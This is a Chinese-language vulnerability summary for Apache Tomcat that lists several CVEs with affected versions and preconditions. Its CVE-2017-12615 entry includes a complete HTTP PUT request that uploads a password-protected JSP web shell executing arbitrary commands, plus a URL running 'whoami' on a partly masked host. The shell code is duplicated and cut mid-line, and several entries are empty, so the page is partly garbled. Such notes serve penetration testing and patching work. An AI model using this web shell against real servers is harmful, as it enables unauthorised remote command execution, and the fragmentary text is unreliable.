应用安全 - 中间件 - Tomcat - 漏洞 - 汇总

管理后台弱口令

 

CVE-2019-0232

Date
2019

类型
任意代码执行

影响版本
Apache Tomcat 9.0.0.M1 to 9.0.17
Apache Tomcat 8.5.0 to 8.5.39
Apache Tomcat 7.0.0 to 7.0.93

前置条件
操作系统：Windows

 

CVE-2019-0211

Date
2019

类型
提权

影响版本

 

CVE-2017-12615

Date
2017

影响范围
 Apache Tomcat 7.0.0 - 7.0.81

前置条件
（1）web.xml


（2）
http协议支持Put请求
（3）

操作系统：Windows

复现

(1)发包

PUT /dark.jsp HTTP/1.1
Host: xx.xx.163.193:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 1039

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("

"+excuteCmd(request.getParameter("cmd"))+"

");}else{out.println(":-)");}%>

(2)命令执行
xx.xx.163.193:8083/dark.jsp?&pwd=023&cmd=whoami

 

CVE-2017-12616
影响范围：Apache Tomcat 7.0.0 - 7.0.80
前置条件： server.xml-VirtualDirContext-默认无-手工添加

CVE-2017-12617-Tomcat RCE
Apache Tomcat 7.0.0 – 7.0.81

Apache Tomcat 块请求远程拒绝服务漏洞(CVE-2014-0075)